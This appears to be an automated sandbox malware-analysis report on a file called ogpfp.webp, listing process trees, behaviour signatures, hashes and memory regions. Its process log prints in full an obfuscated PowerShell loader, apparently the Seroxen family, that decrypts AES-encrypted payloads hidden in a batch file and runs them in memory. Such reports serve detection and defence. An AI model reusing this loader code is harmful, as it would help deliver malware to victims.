Overview

overview

10

Static

static

1

ogpfp.webp

windows7-x64

7

ogpfp.webp

windows10-2004-x64

10

Analysis

  • max time kernel
    115s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    11/11/2023, 19:54

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    ogpfp.webp

  • Size

    2KB

  • MD5

    34c23c33643b37d0a38e636dfdaa7998

  • SHA1

    3468bd3d1ba7605ab2f92c942a64bcd4b361075f

  • SHA256

    525e633900e52ac6f6e58f1e2ddb8585fda73a62babe82d181dc28abceec5aa8

  • SHA512

    5339ea5fe97089dcb3577ac632ce14e2cc5f6bbf67bb8ff19e1d5037ae987d1cb11c3d0dc8b7914b012fc418e7f5d16575df7ff312af98c7c0365c8f2d742356

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\ogpfp.webp
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\ogpfp.webp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7089758,0x7fef7089768,0x7fef7089778
        3⤵
          PID:2012
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1168 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:2
      1⤵
        PID:2664
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
        1⤵
          PID:2708
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
          1⤵
            PID:2584
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2204 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:1
            1⤵
              PID:2472
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2212 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:1
              1⤵
                PID:2540
              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                1⤵
                  PID:2492
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=2732 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:1
                  1⤵
                    PID:1224
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1536 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:2
                    1⤵
                      PID:1704
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --mojo-platform-channel-handle=3372 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:1
                      1⤵
                        PID:2700
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3592 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                        1⤵
                          PID:472
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3632 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                          1⤵
                            PID:932
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3832 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                            1⤵
                              PID:1532
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3820 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                              1⤵
                                PID:1528
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                                1⤵
                                  PID:1684
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3836 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                                  1⤵
                                    PID:1948
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4004 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                                    1⤵
                                      PID:1056
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4128 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                                      1⤵
                                        PID:2672
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4248 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                                        1⤵
                                          PID:1796
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=4248 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:1
                                          1⤵
                                            PID:1544
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 --field-trial-handle=1368,i,2857150067335525274,10357527893001335079,131072 /prefetch:8
                                            1⤵
                                              PID:2612
                                            • C:\Windows\System32\NOTEPAD.EXE
                                              "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Rune Launcher.bat
                                              1⤵
                                                PID:1104
                                              • C:\Windows\system32\cmd.exe
                                                cmd /c ""C:\Users\Admin\Downloads\Rune Launcher.bat" "
                                                1⤵
                                                • Loads dropped DLL
                                                • Suspicious use of WriteProcessMemory
                                                PID:1976
                                                • C:\Users\Admin\Downloads\Rune Launcher.bat.exe
                                                  "Rune Launcher.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function SHGwC($UTBCI){ $fmqbG=[System.Security.Cryptography.Aes]::Create(); $fmqbG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $fmqbG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $fmqbG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdXtlctSlAP8m6SKCcO2vkUdPZ3Es/58jfEWNOVlhFQ='); $fmqbG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/iWwpOMjdiY7RIMNInl/fA=='); $HomqC=$fmqbG.CreateDecryptor(); $return_var=$HomqC.TransformFinalBlock($UTBCI, 0, $UTBCI.Length); $HomqC.Dispose(); $fmqbG.Dispose(); $return_var;}function deYtL($UTBCI){ $znuQU=New-Object System.IO.MemoryStream(,$UTBCI); $MFuZx=New-Object System.IO.MemoryStream; $mbhrH=New-Object System.IO.Compression.GZipStream($znuQU, [IO.Compression.CompressionMode]::Decompress); $mbhrH.CopyTo($MFuZx); $mbhrH.Dispose(); $znuQU.Dispose(); $MFuZx.Dispose(); $MFuZx.ToArray();}function IPTXo($UTBCI,$xCkWf){ $UZztt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UTBCI); $nwjQd=$UZztt.EntryPoint; $nwjQd.Invoke($null, $xCkWf);}$gjCip=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Rune Launcher.bat').Split([Environment]::NewLine);foreach ($iuYEU in $gjCip) { if ($iuYEU.StartsWith('SEROXEN')) { $LOAzE=$iuYEU.Substring(7); break; }}$ceDNZ=[string[]]$LOAzE.Split('\');$SeRqZ=deYtL (SHGwC ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ceDNZ[0])));$KRkmN=deYtL (SHGwC ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ceDNZ[1])));IPTXo $KRkmN (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));IPTXo $SeRqZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1324
                                              • C:\Windows\system32\taskmgr.exe
                                                "C:\Windows\system32\taskmgr.exe" /4
                                                1⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:2384

                                              Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                      Filesize

                                                      363B

                                                      MD5

                                                      ce9f9424d0ebdfcf52fab8fcb749c87e

                                                      SHA1

                                                      7a2542325837b25e7e6cc3d4d7bff2b3c7e6527d

                                                      SHA256

                                                      1ca2240afa10237fad9045ab6e8d72b7f1b4a0cdfe408b9b09777e1938a327e5

                                                      SHA512

                                                      a4785de513165560e20e6fd6b8f7569d272e899e4b39fdf9c5ca28437ecf7da4b453b796ccf0b0463ee7f4da69d5ac3416aceed659386b33f5dfb86da65effa4

                                                      Download Submit

                                                    • C:\Users\Admin\Downloads\Rune Launcher.bat.exe
                                                      Filesize

                                                      462KB

                                                      MD5

                                                      852d67a27e454bd389fa7f02a8cbe23f

                                                      SHA1

                                                      5330fedad485e0e4c23b2abe1075a1f984fde9fc

                                                      SHA256

                                                      a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                                                      SHA512

                                                      327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

                                                      Download Submit

                                                    • \Users\Admin\Downloads\Rune Launcher.bat.exe
                                                      Filesize

                                                      462KB

                                                      MD5

                                                      852d67a27e454bd389fa7f02a8cbe23f

                                                      SHA1

                                                      5330fedad485e0e4c23b2abe1075a1f984fde9fc

                                                      SHA256

                                                      a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                                                      SHA512

                                                      327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

                                                      Download Submit

                                                    • memory/1324-67-0x00000000022C0000-0x0000000002340000-memory.dmp

                                                      Filesize

                                                      512KB

                                                      Download

                                                    • memory/1324-63-0x000007FEF3530000-0x000007FEF3ECD000-memory.dmp

                                                      Filesize

                                                      9.6MB

                                                      Download

                                                    • memory/1324-64-0x0000000001D90000-0x0000000001D98000-memory.dmp

                                                      Filesize

                                                      32KB

                                                      Download

                                                    • memory/1324-65-0x00000000022C0000-0x0000000002340000-memory.dmp

                                                      Filesize

                                                      512KB

                                                      Download

                                                    • memory/1324-66-0x000007FEF3530000-0x000007FEF3ECD000-memory.dmp

                                                      Filesize

                                                      9.6MB

                                                      Download

                                                    • memory/1324-62-0x000000001AFE0000-0x000000001B2C2000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                      Download

                                                    • memory/1324-68-0x00000000022C0000-0x0000000002340000-memory.dmp

                                                      Filesize

                                                      512KB

                                                      Download

                                                    • memory/1324-69-0x00000000022C0000-0x0000000002340000-memory.dmp

                                                      Filesize

                                                      512KB

                                                      Download

                                                    • memory/1324-70-0x000007FEF3530000-0x000007FEF3ECD000-memory.dmp

                                                      Filesize

                                                      9.6MB

                                                      Download

                                                    • memory/2384-75-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/2384-76-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/2384-77-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/2384-78-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download